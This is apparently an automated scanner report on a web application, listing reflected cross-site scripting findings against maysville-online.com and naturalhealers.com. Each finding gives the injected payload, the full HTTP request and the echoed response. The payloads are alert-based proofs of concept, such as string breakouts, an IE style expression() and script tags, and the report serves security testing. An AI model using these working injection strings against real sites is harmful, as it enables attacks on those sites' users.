Date: Tue, 03 May 2011 15:41:06 GMT
X-TN-ServedBy: cms.web.80
X-Loop: 1
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: maysville-online.com
Content-Length: 5917

function LoadCountDownClock(astrUniqueID,astrYear,astrMonth,astrDay,astrHour,astrMinute,astrSecond,astrFormat){var strHTML;strHTML='<div id="'+astrUniqueID+'"></div>';document.write(strHTML);CountDown
...[SNIP]...
<style type="text/css">';
       htmlString += '.upickem-deal-of-the-day .countdown div { display: inline; }';
       htmlString += '.upickem-deal-of-the-day { background: #eeecba3a';alert(1)//ea881ebf66b; border: 1px solid #330066; padding: 0 15px 15px 15px; } ';
       htmlString += '.upickem-deal-of-the-day h3 { background: #330066; color: #FF4A00; padding: 0 10px; line-height: 34px; margin: -1px -16p
...[SNIP]...

6.70. http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php [countColor parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.maysville-online.com
Path:	/app/scripts/ajaxModules/upickemDeal.php

Issue detail

The value of the countColor request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8fc6'%3balert(1)//110369244fe was submitted in the countColor parameter. This input was echoed as c8fc6';alert(1)//110369244fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /app/scripts/ajaxModules/upickemDeal.php?domain=http://maysville.upickem.net&id=27231&bg=eee&headerBg=330066&headerColor=FF4A00&countColor=FF4A00c8fc6'%3balert(1)//110369244fe&regLink=true&title=&upickemSignup=&limit= HTTP/1.1
Host: www.maysville-online.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1
Cookie: TNNoMobile=1

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
Content-Type: text/html; charset=UTF-8
Date: Tue, 03 May 2011 15:41:36 GMT
X-TN-ServedBy: cms.web.80
X-Loop: 1
X-PHP-Engine: enabled
X-Cache-Info: caching
Real-Hostname: maysville-online.com
Content-Length: 5917

function LoadCountDownClock(astrUniqueID,astrYear,astrMonth,astrDay,astrHour,astrMinute,astrSecond,astrFormat){var strHTML;strHTML='<div id="'+astrUniqueID+'"></div>';document.write(strHTML);CountDown
...[SNIP]...
{ float: left; margin-right: 10px; }';
       htmlString += '.upickem-deal-of-the-day dd a { font-weight: bold; color: #000; }';
       htmlString += '.upickem-deal-of-the-day dd.countdown { color: #FF4A00c8fc6';alert(1)//110369244fe; margin-top: 5px; font-weight: bold; }';
       htmlString += '.upickem-deal-of-the-day dd.more-deals { padding-top: 5px; font-size: 11px; }';
       htmlString += '.upickem-deal-of-the-day #upickemSignupForm
...[SNIP]...

6.71. http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php [headerBg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.maysville-online.com
Path:	/app/scripts/ajaxModules/upickemDeal.php

Issue detail

The value of the headerBg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 953e2'%3balert(1)//e535c35fe5 was submitted in the headerBg parameter. This input was echoed as 953e2';alert(1)//e535c35fe5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /app/scripts/ajaxModules/upickemDeal.php?domain=http://maysville.upickem.net&id=27231&bg=eee&headerBg=330066953e2'%3balert(1)//e535c35fe5&headerColor=FF4A00&countColor=FF4A00&regLink=true&title=&upickemSignup=&limit= HTTP/1.1
Host: www.maysville-online.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1
Cookie: TNNoMobile=1

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
Content-Type: text/html; charset=UTF-8
Date: Tue, 03 May 2011 15:41:15 GMT
X-TN-ServedBy: cms.web.80
X-Loop: 1
X-PHP-Engine: enabled
X-Cache-Info: caching
Real-Hostname: maysville-online.com
Content-Length: 5970

function LoadCountDownClock(astrUniqueID,astrYear,astrMonth,astrDay,astrHour,astrMinute,astrSecond,astrFormat){var strHTML;strHTML='<div id="'+astrUniqueID+'"></div>';document.write(strHTML);CountDown
...[SNIP]...
<style type="text/css">';
       htmlString += '.upickem-deal-of-the-day .countdown div { display: inline; }';
       htmlString += '.upickem-deal-of-the-day { background: #eee; border: 1px solid #330066953e2';alert(1)//e535c35fe5; padding: 0 15px 15px 15px; } ';
       htmlString += '.upickem-deal-of-the-day h3 { background: #330066953e2';alert(1)//e535c35fe5; color: #FF4A00; padding: 0 10px; line-height: 34px; margin: -1px -16p
...[SNIP]...

6.72. http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php [headerColor parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.maysville-online.com
Path:	/app/scripts/ajaxModules/upickemDeal.php

Issue detail

The value of the headerColor request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70e87'%3balert(1)//b5f2410c5a5 was submitted in the headerColor parameter. This input was echoed as 70e87';alert(1)//b5f2410c5a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /app/scripts/ajaxModules/upickemDeal.php?domain=http://maysville.upickem.net&id=27231&bg=eee&headerBg=330066&headerColor=FF4A0070e87'%3balert(1)//b5f2410c5a5&countColor=FF4A00&regLink=true&title=&upickemSignup=&limit= HTTP/1.1
Host: www.maysville-online.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1
Cookie: TNNoMobile=1

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Date: Tue, 03 May 2011 15:41:32 GMT
X-TN-ServedBy: cms.web.80
X-Loop: 1
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: maysville-online.com
Content-Length: 5917

function LoadCountDownClock(astrUniqueID,astrYear,astrMonth,astrDay,astrHour,astrMinute,astrSecond,astrFormat){var strHTML;strHTML='<div id="'+astrUniqueID+'"></div>';document.write(strHTML);CountDown
...[SNIP]...
lString += '.upickem-deal-of-the-day { background: #eee; border: 1px solid #330066; padding: 0 15px 15px 15px; } ';
       htmlString += '.upickem-deal-of-the-day h3 { background: #330066; color: #FF4A0070e87';alert(1)//b5f2410c5a5; padding: 0 10px; line-height: 34px; margin: -1px -16px 15px -16px; }';
       htmlString += '.upickem-deal-of-the-day dt img { max-width: 75px; }';
       htmlString += '.upickem-deal-of-the-day dt { float:
...[SNIP]...

6.73. http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php [upickemSignup parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.maysville-online.com
Path:	/app/scripts/ajaxModules/upickemDeal.php

Issue detail

The value of the upickemSignup request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4979f'%3balert(1)//e88e0fd8bd0 was submitted in the upickemSignup parameter. This input was echoed as 4979f';alert(1)//e88e0fd8bd0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /app/scripts/ajaxModules/upickemDeal.php?domain=http://maysville.upickem.net&id=27231&bg=eee&headerBg=330066&headerColor=FF4A00&countColor=FF4A00&regLink=true&title=&upickemSignup=4979f'%3balert(1)//e88e0fd8bd0&limit= HTTP/1.1
Host: www.maysville-online.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1
Cookie: TNNoMobile=1

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Date: Tue, 03 May 2011 15:42:31 GMT
X-TN-ServedBy: cms.web.80
X-Loop: 1
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: maysville-online.com
Content-Length: 6220

function LoadCountDownClock(astrUniqueID,astrYear,astrMonth,astrDay,astrHour,astrMinute,astrSecond,astrFormat){var strHTML;strHTML='<div id="'+astrUniqueID+'"></div>';document.write(strHTML);CountDown
...[SNIP]...
k('dealCounter',cDates[1], cDates[2], cDates[3], cDates[4], cDates[5], cDates[6], 1);

       var WidgetConfig = new Object();
   WidgetConfig.DivID = 'upickemSignupForm';
   WidgetConfig.ConfigurationGUID = '4979f';alert(1)//e88e0fd8bd0';
   WidgetConfig.Scroll = 'auto';
   WidgetConfig.Height = '75';
   WidgetConfig.Width = 'auto';
   CreateEmailSignupWidget(WidgetConfig);
   }

6.74. http://www.maysville-online.com/app/weather/qwikcast_feed0.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.maysville-online.com
Path:	/app/weather/qwikcast_feed0.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63b87"%3bca31f7e83db was submitted in the REST URL parameter 1. This input was echoed as 63b87";ca31f7e83db in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /app63b87"%3bca31f7e83db/weather/qwikcast_feed0.xml HTTP/1.1
Host: www.maysville-online.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(1)-%22ccebc516c28=1
Cookie: TNNoMobile=1; s_cc=true; s_pv=no%20value; s_sq=%5B%5BB%5D%5D; __qca=P0-1669904396-1304455296993

Response

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4682452
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 15:43:42 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.5381
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: maysville-online.com
X-TNCMS-Served-By: cmsapp12
Content-Length: 35245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<!--
           s.pageName="http://maysville-online.com/app63b87";ca31f7e83db/weather/qwikcast_feed0.xml"
           s.server="Maysville"
           s.channel="maysville-online.com"
           s.pageType=""
           s.prop1="homepage"
           s.prop2=""
           s.prop3=""
           s.prop4=""
           s.prop5=""
           s.prop6=""

...[SNIP]...

6.75. http://www.maysville-online.com/app/weather/qwikcast_feed0.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.maysville-online.com
Path:	/app/weather/qwikcast_feed0.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc9ae"style%3d"x%3aexpression(alert(1))"24a7f090c0b was submitted in the REST URL parameter 1. This input was echoed as cc9ae"style="x:expression(alert(1))"24a7f090c0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /appcc9ae"style%3d"x%3aexpression(alert(1))"24a7f090c0b/weather/qwikcast_feed0.xml HTTP/1.1
Host: www.maysville-online.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(1)-%22ccebc516c28=1
Cookie: TNNoMobile=1; s_cc=true; s_pv=no%20value; s_sq=%5B%5BB%5D%5D; __qca=P0-1669904396-1304455296993

Response

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4682812
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 15:43:41 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.3848
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: maysville-online.com
X-TNCMS-Served-By: cmsapp1
Content-Length: 35303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<a href="https://www-dot-maysville-online-dot-com.bloxcms.com/users/login/?referer_url=/appcc9ae"style="x:expression(alert(1))"24a7f090c0b/weather/qwikcast_feed0.xml">
...[SNIP]...

6.76. http://www.maysville-online.com/content/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.maysville-online.com
Path:	/content/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6350"style%3d"x%3aexpression(alert(1))"afd7046f106 was submitted in the REST URL parameter 1. This input was echoed as e6350"style="x:expression(alert(1))"afd7046f106 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /contente6350"style%3d"x%3aexpression(alert(1))"afd7046f106/ HTTP/1.1
Host: www.maysville-online.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: TNNoMobile=1

Response

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4789316
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 15:40:57 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.9828
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: maysville-online.com
X-TNCMS-Served-By: cmsapp8
Content-Length: 35454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<a href="https://www-dot-maysville-online-dot-com.bloxcms.com/users/login/?referer_url=/contente6350"style="x:expression(alert(1))"afd7046f106/">
...[SNIP]...

6.77. http://www.maysville-online.com/content/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.maysville-online.com
Path:	/content/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82f5b"%3b5974e76950d was submitted in the REST URL parameter 1. This input was echoed as 82f5b";5974e76950d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /content82f5b"%3b5974e76950d/ HTTP/1.1
Host: www.maysville-online.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: TNNoMobile=1

Response

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4680120
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 15:40:59 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.9631
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: maysville-online.com
X-TNCMS-Served-By: cmsapp16
Content-Length: 35267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<!--
           s.pageName="http://maysville-online.com/content82f5b";5974e76950d/"
           s.server="Maysville"
           s.channel="maysville-online.com"
           s.pageType=""
           s.prop1="homepage"
           s.prop2=""
           s.prop3=""
           s.prop4=""
           s.prop5=""
           s.prop6=""
           s.prop7=""
           s.prop8=""

...[SNIP]...

6.78. http://www.maysville-online.com/content/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.maysville-online.com
Path:	/content/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3a2e"-alert(1)-"f8cf8d87874 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/?c3a2e"-alert(1)-"f8cf8d87874=1 HTTP/1.1
Host: www.maysville-online.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: TNNoMobile=1

Response

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4640076
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 15:40:42 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.3075
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: maysville-online.com
X-TNCMS-Served-By: cmsapp6
Content-Length: 35227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<!--
           s.pageName="http://maysville-online.com/content/?c3a2e"-alert(1)-"f8cf8d87874=1"
           s.server="Maysville"
           s.channel="maysville-online.com"
           s.pageType=""
           s.prop1="homepage"
           s.prop2=""
           s.prop3=""
           s.prop4=""
           s.prop5=""
           s.prop6=""
           s.prop7=""
           s.prop8=""

...[SNIP]...

6.79. http://www.maysville-online.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.maysville-online.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1e70"style%3d"x%3aexpression(alert(1))"7a060a3ea66 was submitted in the REST URL parameter 1. This input was echoed as e1e70"style="x:expression(alert(1))"7a060a3ea66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /e1e70"style%3d"x%3aexpression(alert(1))"7a060a3ea66 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.maysville-online.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4690004
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 10:47:52 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.2412
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: Keep-Alive
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: maysville-online.com
X-TNCMS-Served-By: cmsapp13
Content-Length: 35060

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<a href="https://www-dot-maysville-online-dot-com.bloxcms.com/users/login/?referer_url=/e1e70"style="x:expression(alert(1))"7a060a3ea66/">
...[SNIP]...

6.80. http://www.maysville-online.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.maysville-online.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e48b"%3b5ee898a3ded was submitted in the REST URL parameter 1. This input was echoed as 1e48b";5ee898a3ded in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /1e48b"%3b5ee898a3ded HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.maysville-online.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4689680
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 10:47:52 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.2417
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: Keep-Alive
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: maysville-online.com
X-TNCMS-Served-By: cmsapp3
Content-Length: 34873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<!--
           s.pageName="http://maysville-online.com/1e48b";5ee898a3ded/"
           s.server="Maysville"
           s.channel="maysville-online.com"
           s.pageType=""
           s.prop1="homepage"
           s.prop2=""
           s.prop3=""
           s.prop4=""
           s.prop5=""
           s.prop6=""
           s.prop7=""
           s.prop8=""

...[SNIP]...

6.81. http://www.maysville-online.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.maysville-online.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be4e4"-alert(1)-"ccebc516c28 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /favicon.ico?be4e4"-alert(1)-"ccebc516c28=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.maysville-online.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4649020
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 10:47:43 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.2061
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: Keep-Alive
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: maysville-online.com
X-TNCMS-Served-By: cmsapp5
Content-Length: 34970

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<!--
           s.pageName="http://maysville-online.com/favicon.ico?be4e4"-alert(1)-"ccebc516c28=1"
           s.server="Maysville"
           s.channel="maysville-online.com"
           s.pageType=""
           s.prop1="homepage"
           s.prop2=""
           s.prop3=""
           s.prop4=""
           s.prop5=""
           s.prop6=""
           s.prop7=""
           s.prop8=""

...[SNIP]...

6.82. http://www.naturalhealers.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.naturalhealers.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d0286<script>alert(1)</script>41cb61d962e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icod0286<script>alert(1)</script>41cb61d962e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.naturalhealers.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:59:30 GMT
Server: Apache/2.0.52 (Red Hat) PHP/4.3.9 mod_ssl/2.0.52 OpenSSL/0.9.7a
X-Powered-By: PHP/4.3.9
Set-Cookie: NaturalHealers=a196283b02e135e7192e777c542f696e; expires=Thu, 02-Jun-2011 10:59:30 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NON DSP COR ADMa DEVa PSAa PSDa OUR OTRa IND UNI"
x-ua-compatible: IE=EmulateIE7
